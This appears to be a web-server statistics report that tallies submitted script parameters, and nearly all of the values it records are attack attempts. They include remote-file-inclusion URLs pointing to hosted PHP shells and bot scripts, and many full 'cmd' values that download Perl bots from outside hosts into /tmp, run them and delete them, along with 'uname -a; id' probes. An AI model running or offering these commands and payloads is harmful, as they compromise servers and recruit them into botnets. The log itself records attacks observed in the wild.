cd /tmp;GET http://johncarter.50webs.com/bot.txt > bot.txt;p
erl bot.txt;rm bot.txt
13
cd /tmp;rm but.txt;wget http://eep.br/~gpereira/but.txt;fetc
h http://eep.br/~gpereira/but.txt;lwp-download http://eep.br
/~gpereira/but.txt;curl -O http://eep.br/~gpereira/but.txt;l
ynx http://eep.br/~gpereira/but.txt;perl but.txt
11
Parameter list
ValueAccesses
1 4
Parameter mo/www.locations-cotedazur.com/index.php?lg
ValueAccesses
http://www.freewebs.com/h1h1h1/p.txt?? 5
http://www.rj2009.kit.net/ddd.txt? 4
http://www.freewebs.com/t420/p.txt?? 4
http://www.rj2008.kit.net/p.txt?? 3
http://www.freewebs.com/playssonn/p.txt?? 3
http://www.rj2009.kit.net/p.txt? 2
http://www.freewebs.com/quitando/p.txt?? 1
http://www.rj2009.kit.net/p.txt?? 1
http://www.chapolin-ownz.us/inbox.txt? 1
http://www.rj2009.kit.net/ddd.txt?? 1
Parameter mosConfig_absolute_
ValueAccesses
http://www.lordxpl.we.bs/own.txt???? 4
http://joaobenner.googlepages.com/script2.txt?? 3
http://www.lordxpl.xpg.com.br/own.txt???? 2
Parameter mosConfig_absolute_path
ValueAccesses
http://qlzr.host.sk/line.gif? 153
http://dark4ngel.hostinggratisargentina.com/http? 106
http://usuarios.arnet.com.ar/larry123/safe.txt? 105
http://spr0x.kit.net/cmdpriv8/tool25.dat? 92
http://www.jungo8949.co.kr/tool25.txt? 74
http://ownsirc.googlepages.com/botnet.txt? 57
50
http://www.freewebs.com/yahwek/phpbot.txt? 48
http://www.oslutadores.com/?id=23530 46
http://www.autogas-dortmund.de/index.txt? 45
Parameter mosConfig_absolute_pathhttp://www.r57.li/c99.txt?
ValueAccesses
2
Parameter mosconfig_absolute_path
ValueAccesses
30
http://agatsuma.bestfreewebspace.net/bn 2
Parameter s
ValueAccesses
r 2
Parameter xroot
ValueAccesses
www.popcorn.de/cmd? 1
OTHER: 5,733
ScriptTotal Accesses
/wusage/weekly// 5,719
Parameters by Submitted Value
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://incesp.com/id1.txt? 2
http://kb27.co.kr/bbs///id1.txt?? 1
http://withkor.net/snapshot/id1.txt?? 1
Parameter CONFIG_EXT[LIB_DIR]
ValueAccesses
http://www.hotelmoulin.com/db/icon/aa.txt? 3
http://www.johngarzon.com.co/list/heheh.txt???? 2
Parameter DIR_PREFIX
ValueAccesses
http://www.the-real.com/steelbahamas/id1.txt?? 2
Parameter DOCUMENT_ROOT
ValueAccesses
http://comhelp.spb.ru//idxx.txt??? 6
http://www.seeum.co.kr/zero/zipcode/crespon1.txt? 6
http://www.foodntop.com/bbs/data/notice_1/robot.txt???? 3
http://www.allforweb.co.kr/data/lang/fatal1.txt?? 2
http://www.seeum.co.kr/zero/data/idxx.txt?? 2
http://www.lazar.ru/manager/processors/min.txt? 2
http://www.kq-china.com/web//plugins/system/id1.txt??? 2
http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? 1
http://cemerlangclean.com/byz9991.txt?? 1
http://www.someday-store.com/shop/images/uploads/.../.../1.t
xt??
1
Parameter GLOBALS
ValueAccesses
154
Parameter INCLUDE_FOLDER
ValueAccesses
http://www.howtolisten.kr/lct/exam3/81/auto1.txt? 10
http://surihouse.co.kr/bbs/skin/sakk_k/fx29id1.txt? 4
http://www.luvyadating.com/temp/cache/userimages/id/id1.txt?
?
4
http://www.fileden.com/files/2009/11/5/2637636/id1.txt?? 4
http://www.tosiltosil.net/zero//skin/z_music_let_b/images/ve
r1?
3
http://www.clubmodellismocimavilla.com/web/htdocs/data/1.txt
??
2
http://musicadelibreria.net/footer? 2
http://listwm.info//fx29id.txt? 2
http://zonadeclientes.com/id1.txt?? 2
http://www.babywaves.com//a/pid?? 2
Parameter Inc[temp_root]
ValueAccesses
http://creative-alchemy.com/zencart//media/id1.txt??? 1
Parameter Itemid
ValueAccesses
2
Parameter REX[INCLUDE_PATH]
ValueAccesses
http://www.foodntop.com/bbs/icon/LC1?? 4
http://www.foodntop.com/bbs/data/notice_1/robot.txt???? 3
http://kumcalb.org///g4/adm/img/thumb/id1.txt? 2
http://www.fileden.com/files/2010/1/5/2714272/id1.txt? 1
Parameter SERVER[DOCUMENT_ROOT]
ValueAccesses
http://phoviet.vn.net//backend/id1.txt??? 2
OTHER: 5,478
ScriptTotal Accesses
/wusage/summary/cgi.html//components/com_facileforms/facilef
orms.frame.php
5,709
Parameters by Submitted Value
Parameter
ValueAccesses
1
Parameter cmd
ValueAccesses
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch
http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11
0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx
http://garyz.110mb.com/bnt.txt;perl bnt.txt
30
cd /tmp;GET http://johncarter.50webs.com/bot.txt > bot.txt;p
erl bot.txt;rm bot.txt
24
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
22
cd /tmp;GET http://www.army5.com.br/bot.txt > bot.txt;perl b
ot.txt;rm bot.txt
22
cd /tmp;GET http://johncarter.50webs.com/bruxOm4l.txt > brux
Om4l.txt;perl bruxOm4l.txt abcase
20
cd /tmp;rm bn.txt;wget http://garyz.110mb.com/bn.txt;fetch h
ttp://garyz.110mb.com/bn.txt;lwp-download http://garyz.110mb
.com/bn.txt;curl -O http://garyz.110mb.com/bn.txt;lynx http:
//garyz.110mb.com/bn.txt;perl bn.txt
17
cd /tmp;rm root.txt;wget www.3sk3nt.kit.net/root.txt;fetch w
ww.3sk3nt.kit.net/root.txt;lwp-download www.3sk3nt.kit.net/r
oot.txt;curl -O www.3sk3nt.kit.net/root.txt;lynx www.3sk3nt.
kit.net/root.txt;perl root.txt
16
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
15
cd /tmp;GET http://spr0x.kit.net/bot.txt > bot.txt;perl bot.
txt;rm bot.txt
14
cd /tmp;rm scan.txt;wget http://garyz.110mb.com/scan.txt;fet
ch http://garyz.110mb.com/scan.txt;lwp-download http://garyz
.110mb.com/scan.txt;curl -O http://garyz.110mb.com/scan.txt;
lynx http://garyz.110mb.com/scan.txt;perl scan.txt;rm -rf sc
an.txt
14
Parameter ff_colendar/samplecalendar.php/oneadmin/adminfoot.php?path[d
ocroot]
ValueAccesses
http://www.freewebs.com/h1h1h1/p.txt?? 6
http://www.rj2008.kit.net/p.txt?? 6
http://www.freewebs.com/t420/p.txt?? 5
http://www.rj2009.kit.net/ddd.txt? 5
http://www.freewebs.com/playssonn/p.txt?? 4
http://www.digownz.kit.net/pbot1.txt?? 4
http://www.freewebs.com/b0mb4do1337/p.txt?? 4
http://www.rj2009.kit.net/p.txt? 2
http://flaw.we.bs/a.txt? 2
http://www.chapolin-ownz.us/inbox.txt? 1
Parameter ff_compath
ValueAccesses
http://spr0x.kit.net/cmdpriv8/tool25.dat? 121
http://ownsirc.googlepages.com/botnet.txt? 83
http://www.lordxpl.xpg.com.br/own.txt? 69
http://www.freewebs.com/yahwek/phpbot.txt? 68
http://www.lordxpl.xpg.com.br/own.txt?? 66
http://www.oslutadores.com/?id=23530 58
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 53
http://www.freewebs.com/yahwek/sete.txt? 51
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www?????????????????????????????
50
49
Parameter ff_compathhttp://www.gvnr.xpg.com.br/Hotmail.txt?
ValueAccesses
1
Parameter list
ValueAccesses
1 18
Parameter mosConfig_absolute_path
ValueAccesses
http://www.ritterspektakel-leipzig.de/administrator/can? 1
OTHER: 4,787
ScriptTotal Accesses
/wusage/summary/cgi.html//include.php 5,014
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
25
uname -a; id 11
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch
http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11
0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx
http://garyz.110mb.com/bnt.txt;perl bnt.txt
10
id 10
cd /tmp;rm start.txt;wget http://71.41.190.203/start.txt;fet
ch http://71.41.190.203/start.txt;lwp-download http://71.41.
190.203/start.txt;curl -O http://71.41.190.203/start.txt;lyn
x http://71.41.190.203/start.txt;perl start.txt;rm -rf start
.txt*
8
cd /tmp;rm srz.txt;wget http://www.freewebs.com/bl4bl4bl4bl4
/srz.txt;fetch http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;
lwp-download http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;cu
rl -O http://www.freewebs.com/bl4bl4bl4bl4/srz.txt;lynx http
://www.freewebs.com/bl4bl4bl4bl4/srz.txt;perl srz.txt;rm -rf
srz.txt*
8
cd /tmp;killall perl -9;rm -rf *.txt;GET http://murilok.pop3
.ru/RFI3.txt > RFI3.txt;perl RFI3.txt;rm RFI3.txt
6
cd /tmp;rm bn.txt;wget http://www.ownedson.110mb.com/bn.txt;
fetch http://www.ownedson.110mb.com/bn.txt;lwp-download http
://www.ownedson.110mb.com/bn.txt;curl -O http://www.ownedson
.110mb.com/bn.txt;lynx http://www.ownedson.110mb.com/bn.txt;
perl bn.txt
6
cd /tmp;wget http://projectyenor2.iespana.es/file234.txt;cur
l -O http://projectyenor2.iespana.es/file234.txt;fetch http:
//projectyenor2.iespana.es/file234.txt;lynx http://projectye
nor2.iespana.es/file234.txt;lwp-download http://projectyenor
2.iespana.es/file234.txt;perl file234.txt??
6
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt;
fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee
p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t
xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf
*.txt
5
Parameter list
ValueAccesses
1 28
Parameter path[docroot]
ValueAccesses
http://ownsirc.googlepages.com/botnet.txt? 85
http://www.rele.by/files/id.txt? 66
http://www.oslutadores.com/?id=23530 62
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 58
http://www.freewebs.com/yahwek/sete.txt? 56
http://www.freewebs.com/yahwek/phpbot.txt? 55
http://www.jolieloves.com/mori/cmd.txt? 53
http://189.23.251.131/~tiago/new.txt? 52
44
http://www.lordxpl.xpg.com.br/own.txt?? 39
OTHER: 4,321
ScriptTotal Accesses
/// 4,709
Parameters by Submitted Value
Parameter APB_rp
ValueAccesses
http://jvo.dk/fuursaml/TNG//gedcom_folder/babid.txt??? 3
Parameter CONFIG[path]
ValueAccesses
http://gumansin.com/pds/1.txt?? 3
Parameter DIR_PREFIX
ValueAccesses
http://www.town-classifieds.com/adpics/baner.txt??? 3
http://boeuftrad.free.fr//yacs/scripts/staging/files/idv6.tx
t? ??
1
http://boeuftrad.free.fr//yacs/scripts/staging/files/id1.txt
? ?
1
http://www.lazar.ru/manager/processors/copyright.txt? ?? 1
Parameter DOCUMENT_ROOT
ValueAccesses
http://dk.fileave.com/heheh.txt???? 9
http://190.81.28.182/incaware/id1.txt?? 4
http://www.corretoresdeseguros.com.br/estatisticas/id1??? 3
http://www.hondooo.de//components/com_extcalendar/lib/data/i
d.txt??
2
http://gumansin.com/id.txt?? 1
http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/das/canales3
.txt??
1
Parameter FORM[session_id]
ValueAccesses
1 3
Parameter FORM[set]
ValueAccesses
1 3
Parameter GALLERY_BASEDIR
ValueAccesses
http://www.readingastro.org.uk/images/photos/about/id.txt?? 3
Parameter GLOBALS
ValueAccesses
20
Parameter INCLUDE_FOLDER
ValueAccesses
http://nic.bupt.edu.cn/media/j1.txt?? 1
http://www.c21vox.tv/id1.txt?? 1
http://surya1.fileave.com/id.txt?? 1
http://www.jjdd.co.kr/nalog/plug_in_config/pro//id1??? 1
Parameter INCLUDE_PATH
ValueAccesses
http://musicadelibreria.net/footer?? 1
OTHER: 4,643
ScriptTotal Accesses
/wusage/summary/cgi.html//modules/xfsection/modify.php 4,696
Parameters by Submitted Value
Parameter caminho
ValueAccesses
marajoara 1
Parameter cmd
ValueAccesses
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
24
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per
l botx2.txt;rm -rf *txt*
22
uname -a; id 17
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
14
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p
erl botx2.txt;rm -rf *txt*
13
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2.
txt;rm -rf *txt*
10
cd /tmp;lwp-download http://h1.ripway.com/arroba5/botx.txt;p
erl botx.txt;rm -rf *botx*
8
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt;
fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee
p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t
xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf
*.txt
7
id 7
cd /tmp;wget http://h1.ripway.com/cmdtsk/botx2.txt;perl botx
2.txt;rm -rf *txt*
7
Parameter dir_module
ValueAccesses
http://ownsirc.googlepages.com/botnet.txt? 85
http://www.oslutadores.com/?id=23530 62
http://www.jolieloves.com/mori/cmd.txt? 56
http://www.freewebs.com/yahwek/sete.txt? 52
http://189.23.251.131/~tiago/new.txt? 51
http://h1.ripway.com/tsk4/cmd.txt? 50
http://www.freewebs.com/yahwek/phpbot.txt? 50
47
http://www.diabinhoinfernal.kit.net/iLeGaiS/tool25.txt? 36
http://lol123.fileave.com/script9.txt?? 34
Parameter list
ValueAccesses
1 26
OTHER: 4,017
ScriptTotal Accesses
/wusage/weekly/ 3,634
Parameters by Submitted Value
Parameter ///////administrator/components/com_remository/admin.remosit
ory.php?mosConfig_absolute_path
ValueAccesses
http://sites.google.com/site/nurhayatisatu/1.txt??? 4
http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CI
MG1122.jpg???
3
http://phamsight.com/docs/images/head?? 1
Parameter //kboard/kboard.php?board
ValueAccesses
notice 2
Parameter /zb_path
ValueAccesses
http://www.kwangsung.es.kr//UserFiles/shirohige/zfxid.txt?? 1
Parameter APB_rp
ValueAccesses
http://www.bellasbar.co.za//templates_c/5.gif?? 13
http://www.camoplast.com/pdf/1.gif? 6
http://www.baab.it/roxa/id1.txt??? 4
http://www.lan51.fr/Portail/tp-images/a.gif?? 4
http://www.artvariety.co.za/scan/zfxid1.txt?? 2
http://www.kerfootgroup.co.uk/kf_pics/id1.txt???? 2
http://roxd.altervista.org/id1.txt??? 1
http://roxxxx.altervista.org/id1.txt??? 1
Parameter BESIDER
ValueAccesses
http://elitewa.go.ro/copyright.txt?? 1
Parameter CFG[libdir]
ValueAccesses
http://aboutav.com//o/id1.txt??? 2
Parameter CONFIG_EXT[ADMIN_PATH]
ValueAccesses
http://www.assa.co.kr/taijin76/bbs//skin/ggambo7002_board/co
py/id1.txt??
2
Parameter CONFIG_EXT[LANGUAGES_DIR]
ValueAccesses
http://163.16.46.253/appserv/www/fx29id1.txt?? 6
http://www.phoxlab.com.br//xmlrpc/fx29id.txt???? 4
Parameter CONFIG_EXT[LIB_DIR]
ValueAccesses
http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? 2
http://expo.ubsc.or.kr/board///mail/mailer/fx29id2.txt?? 1
Parameter DOCUMENT_ROOT
ValueAccesses
http://www.enyzone.cz/components/com_poll/z1?? 10
http://setennis.com/zb41pl8/bbs/id1.txt? 4
http://saskatchewan.localjobshop.ca/media/id1?? 3
http://www.steannareptile.it//administrator/id1.txt?? 3
http://pdcmanagement.com///idfx1.gif??? 3
http://users4.nofeehost.com/anjrit/fx/id1.txt?? 3
http://www.mama-nsk.ru/fx29id.txt? 3
http://evgs-hohwald.de/pear/fx29id.txt?? 2
http://www.pmibangalorechapter.org/pmpc2009/x? 2
http://jeffbickford.com/widgets/z1?? 2
OTHER: 3,537
ScriptTotal Accesses
/wusage/summary/cgi.html/components/com_phpshop/toolbar.phps
hop.html.php
3,465
Parameters by Submitted Value
Parameter cmd
ValueAccesses
cd /tmp;rm x.txt;wget http://201.37.71.117:8090/x.txt;fetch
http://201.37.71.117:8090/x.txt;lwp-download http://201.37.7
1.1175:8090/x.txt;curl -O http://201.37.71.117:8090/x.txt;ly
nx http://201.37.71.117:8090/x.txt;perl x.txt
21
id 14
cd /tmp;rm start.txt;wget http://189.24.138.40/start.txt;fet
ch http://189.24.138.40/start.txt;lwp-download http://189.24
.138.40/start.txt;curl -O http://189.24.138.40/start.txt;lyn
x http://189.24.138.40/start.txt;perl start.txt;rm start.txt
13
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
11
cd /tmp;rm bnt.txt;wget http://garyz.110mb.com/bnt.txt;fetch
http://garyz.110mb.com/bnt.txt;lwp-download http://garyz.11
0mb.com/bnt.txt;curl -O http://garyz.110mb.com/bnt.txt;lynx
http://garyz.110mb.com/bnt.txt;perl bnt.txt
10
cd /tmp;rm sta.txt;wget http://189.24.221.165:9090/sta.txt;f
etch http://189.24.221.165:9090/sta.txt;lwp-download http://
189.24.221.165:9090/sta.txt;curl -O http://189.24.221.165:90
90/sta.txt;lynx http://189.24.221.165:9090/sta.txt;perl sta.
txt;rm sta.txt
9
cd /tmp;wget http://206.71.148.32/anaozao.txt;curl -O -f htt
p://206.71.148.32/anaozao.txt;lynx -source http://206.71.148
.32/anaozao.txt;lwp-rget http://206.71.148.32/anaozao.txt;fe
tch http://206.71.148.32/anaozao.txt;perl anaozao.txt;rm -rf
anaozao.txt
8
cd /tmp;rm -rf box.txt;wget http://eep.br/~gpereira/box.txt;
fetch http://eep.br/~gpereira/box.txt;lwp-download http://ee
p.br/~gpereira/box.txt;curl -O http://eep.br/~gpereira/box.t
xt;lynx http://eep.br/~gpereira/box.txt;perl box.txt;rm -rf
*.txt
8
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
7
cd /tmp;rm pemlk.txt;wget http://members.lycos.co.uk/enviesc
raps/pemlk.txt;fetch http://members.lycos.co.uk/enviescraps/
pemlk.txt;lwp-download http://members.lycos.co.uk/enviescrap
s/pemlk.txt;curl -O http://members.lycos.co.uk/enviescraps/p
emlk.txt;lynx http://members.lycos.co.uk/enviescraps/pemlk.t
xt;perl pemlk.txt;rm -rf pemlk*.txt
7
Parameter list
ValueAccesses
1 13
Parameter mosConfig_absolute_path
ValueAccesses
http://ownsirc.googlepages.com/botnet.txt? 59
http://www.jolieloves.com/mori/cmd.txt? 47
http://www.jungo8949.co.kr/tool25.txt? 42
http://www.oslutadores.com/?id=23530 36
http://www.freewebs.com/yahwek/sete.txt? 31
http://www.neoncomanda.kit.net/tool25.dat? 30
http://www.freewebs.com/yahwek/phpbot.txt? 30
28
http://www2.binaryshadow.org:81/~w00t/my/tool/tool25.dat? 26
http://189.23.251.131/~tiago/new.txt? 26
OTHER: 2,989
ScriptTotal Accesses
/wusage/summary/cgi.html/modules/AllMyGuests/signin.php 3,452
Parameters by Submitted Value
Parameter _AMGconfig[cfg_serverpath]
ValueAccesses
http://c4sh1234.100free.com/sc.gif? 52
http://ownsirc.googlepages.com/botnet.txt? 47
http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/ima
ges/.asc/www?????????????????????????????
39
http://www.freewebs.com/yahwek/sete.txt? 35
http://www.oslutadores.com/?id=23530 34
http://www.jungo8949.co.kr/tool25.txt? 34
http://www.bergenfest.no/vnc/cmd.txt? 32
http://h1.ripway.com/tsk4/cmd.txt? 32
http://www.freewebs.com/yahwek/phpbot.txt? 25
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 24
Parameter _AMGconfig[cfg_serverpats/tinycontent/admin/spaw/spaw_contro
l.class.php?spaw_root
ValueAccesses
http://www.digownz.kit.net/pbot1.txt?? 9
http://www.rj2009.kit.net/ddd.txt? 6
http://www.rj2008.kit.net/p.txt?? 6
http://www.freewebs.com/h1h1h1/p.txt?? 6
http://www.freewebs.com/t420/p.txt?? 6
http://www.freewebs.com/playssonn/p.txt?? 5
http://www.freewebs.com/b0mb4do1337/p.txt?? 4
http://www.digownz.kit.net/pbot1.txt? 4
http://flaw.we.bs/a.txt? 3
http://www.rj2009.kit.net/burro.txt? 2
Parameter _AMGconfigcfg_serverpath]
ValueAccesses
http://h1.ripway.com/tsk4/cmd.txt? 31
http://h1.ripway.com/tsk7/cmd.txt? 11
http://h1.ripway.com/tsk4/botlogin.txt? 6
http://www.019online.com/components/com_rwcards/images/cmd.t
xt?
5
http://h1.ripway.com/tsk4/TESTE.txt? 4
http://h1.ripway.com/tsk7/botINDO.txt? 3
http://www.auzr.kz/tender/files/cmd.jpg? 3
http://www.miskolctapolca.hu/hirdetesek/IND.jpg? 3
http://www.auzr.kz/tender/files/cmd.txt? 3
http://kopideja.lv/angel/1.txt? 2
Parameter caminho
ValueAccesses
marajoara 1
Parameter chdir
ValueAccesses
1
Parameter cmd
ValueAccesses
cd /tmp;lwp-download http://h1.ripway.com/tsk4/botx2.txt;per
l botx2.txt;rm -rf *txt*
27
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
17
cd /tmp;wget http://h1.ripway.com/tsk4/botx2.txt;perl botx2.
txt;rm -rf *txt*
15
cd /tmp;lwp-download http://h1.ripway.com/cmdtsk/botx2.txt;p
erl botx2.txt;rm -rf *txt*
14
uname -a; id 12
cd /tmp;lwp-download http://www.019online.com/components/com
_rwcards/images/IND2.jpg;curl -O http://www.019online.com/co
mponents/com_rwcards/images/IND2.jpg;wget http://www.019onli
ne.com/components/com_rwcards/images/IND2.jpg;perl IND2.jpg;
rm -rf *IND*
11
cd /tmp;killall perl -9;rm -rf *.txt;GET http://lolzao.pop3.
ru/scanz.txt > scanz.txt;perl scanz.txt;rm scanz.txt
11
cd /tmp;lwp-download http://h1.ripway.com/tsk7/botx2.txt;per
l botx2.txt;rm -rf *txt*
9
cd /tmp;curl -O http://h1.ripway.com/tsk7/botx2.txt;perl bot
x2.txt;rm -rf *txt*
8
cd /tmp;wget http://h1.ripway.com/cmdtsk/botx2.txt;perl botx
2.txt;rm -rf *txt*
8
Parameter list
ValueAccesses
1 19
OTHER: 2,823
ScriptTotal Accesses
/wusage/summary/cgi.html//index.php 3,235
Parameters by Submitted Value
Parameter GLOBALS
ValueAccesses
36
http://tanbebek.com/pitik/ascid.txt??? 1
Parameter Itemid50
ValueAccesses
3
Parameter Itemid
ValueAccesses
350
26 4
1 2
191//administrator/configuration.php?option=com_login 2
156 2
87//index.php?option=com_joomlaxplorer 1
149 1
87 1
Parameter _REQUEST
ValueAccesses
37
Parameter _REQUEST[Itemid
ValueAccesses
1 2
Parameter _REQUEST[Itemid]
ValueAccesses
1 35
Parameter _REQUEST[option]
ValueAccesses
com_content 19
com_phpshop 7
com_rsgallery 4
com_login 3
com_facileforms 2
com_performs 1
com_extcalendar 1
http://sujianto.com/zreg.txt? 1
Parameter action
ValueAccesses
show_error 11
Parameter admin_path
ValueAccesses
http://www.iammypersonalbest.com/oneadmin/linksdir/id.txt? 3
Parameter autoLoadConfig[999][0][autoType]
ValueAccesses
include 43
http://normanzito.iespana.es/http.txt?? 6
http://cornuletz.angelfire.com/c99in.txt? 5
http://www.corsemusique.com/portail/agenda/config/tester.txt
?
3
http://www.corsemusique.com/portail/agenda/muie.txt? 3
http://freewebs.com/diegoxfelix/ch.txt? 2
http://mykonos.bargaingreece.com//components/com_log/sefe.tx
t?
2
includehttp://pc2you.ro/classes/phpmailer/config/exp667.txt?
1
http://www.lammera.altervista.org/php5/r57.txt??? ? 1
http://www.perphilrh.com.br/perphilrh/muie.txt? 1
OTHER: 2,639
ScriptTotal Accesses
/wusage/summary/cgi.html/index.php 3,170
Parameters by Submitted Value
Parameter
ValueAccesses
connection:absolute_path=http://invisionar.hostinggratisarge
ntina.com/eth0?
15
connection:absolute_path=http://www.santiagoonline.com.ar/ht
tp?
9
connection:absolute_path=http://www.santiagoonline.com.ar/re
adme.txt?
6
connection:absolute_path=http://usuarios.arnet.com.ar/adrikr
asnow/test.txt?
4
connection:absolute_path=http://tckct.co.uk/public_htm/speed
.txt?
3
connection:absolute_path=http://www.santiagoonline.com.ar/re
adme.txt?http://www.santiagoonline.com.ar/readme.txt?
3
connection:absolute_path=http://www.hoopster.1142degrees.com
./articles/te.jpg?
2
http://aguasanas.com/dysloke/bot.txt? 2
connection:absolute_path=http://usuarios.arnet.com.ar/larry1
23/safe.txt?
2
connection:absolute_path=http://geragay.bravehost.com/http? 2
Parameter GLOBALS
ValueAccesses
140
Parameter HomeDir
ValueAccesses
http://darkisx.com/plugins/xoops/2fast.txt? 1
Parameter Itemid
ValueAccesses
253
1 17
156 4
http://luminaldemon.altervista.org/img/cmd.txt??????????? 1
Parameter RP_PATH
ValueAccesses
http://eventtoday.com/bbs/skin/gallery_thum/safe.txt? 1
http://www.wisdomofgod.org/backup/m2f/.r/vampire.txt? 1
http://www.mascht.com/picart/mh.txt?? 1
http://www.wisdomofgod.org/backup/m2f/.r/vampire.txt??? 1
http://www.spindl-hotelpraha.cz/system/temp/control.txt? 1
http://c0cac0larul3z.t35.com/cmd.txt? 1
Parameter _REQUEST
ValueAccesses
147
http://usuarios.arnet.com.ar/adrikrasnow/speed.txt? 20
http://normanzito.iespana.es/http.txt?? 18
http://usuarios.arnet.com.ar/adipasqua/http? 15
http://usuarios.arnet.com.ar/larry123/ka.txt? 15
http://usuarios.arnet.com.ar/larry123/exploit.txt? 14
http://usuarios.arnet.com.ar/larry123/http? 13
http://dark4ngel.hostinggratisargentina.com/http? 12
http://www.iff.coop/.../bre.txt? 9
http://fxmsn.org/1.txt? 9
Parameter _REQUEST[Itemid
ValueAccesses
1 4
Parameter _REQUEST[Itemid]
ValueAccesses
1 136
http://www.colorglo.it/oneadmin/calendar/.r/stringa.txt? 1
Parameter _REQUEST[option]
ValueAccesses
com_content 70
com_phpshop 32
com_login 9
com_akobook 7
com_rsgallery 5
option,com_extcalendar 4
com_sitemap 3
com_com_akobook 3
com_phshop 2
com_facileforms 2
Parameter absolute_path
ValueAccesses
http://www.skd.it/vwar/admin/can? 1
OTHER: 2,149
ScriptTotal Accesses
/wusage/summary/cgi.html/newspublish/include.php 3,026
Parameters by Submitted Value
Parameter cmd
ValueAccesses
uname -a; id 16
cd /tmp;wget http://www.pedr0.kit.net/bb.txt;fetch http://ww
w.pedr0.kit.net/bb.txt;lwp-download http://www.pedr0.kit.net
/bb.txt;curl -O http://www.pedr0.kit.net/bb.txt;lynx http://
www.pedr0.kit.net/bb.txt;perl bb.txt;rm -rf bb.txt
10
cd /tmp;rm pemlk.txt;wget http://pemlk.iespana.es/tools/peml
k.txt;fetch http://pemlk.iespana.es/tools/pemlk.txt;lwp-down
load http://pemlk.iespana.es/tools/pemlk.txt;curl -O http://
pemlk.iespana.es/tools/pemlk.txt;lynx http://pemlk.iespana.e
s/tools/pemlk.txt;perl pemlk.txt;rm pemlk.txt?
6
cd /tmp;rm ng*;wget http://ownz-you.com/ng.txt;fetch http://
ownz-you.com/ng.txt;lwp-download http://ownz-you.com/ng.txt;
curl -O http://ownz-you.com/ng.txt;lynx http://ownz-you.com/
ng.txt;perl ng.txt;rm -rf ng*
6
id 6
cd /tmp;rm sta.txt;wget http://189.24.20.53/sta.txt;fetch ht
tp://189.24.20.53/sta.txt;lwp-download http://189.24.20.53/s
ta.txt;curl -O http://189.24.20.53/sta.txt;lynx http://189.2
4.20.53/sta.txt;perl sta.txt;rm sta.txt
6
cd /var/tmp;rm botnet.txt;wget http://www.powerbikes.gr/foru
m/botnet.txt;fetch http://www.powerbikes.gr/forum/botnet.txt
;lwp-download http://www.powerbikes.gr/forum/botnet.txt;curl
-O http://www.powerbikes.gr/forum/botnet.txt;lynx http://ww
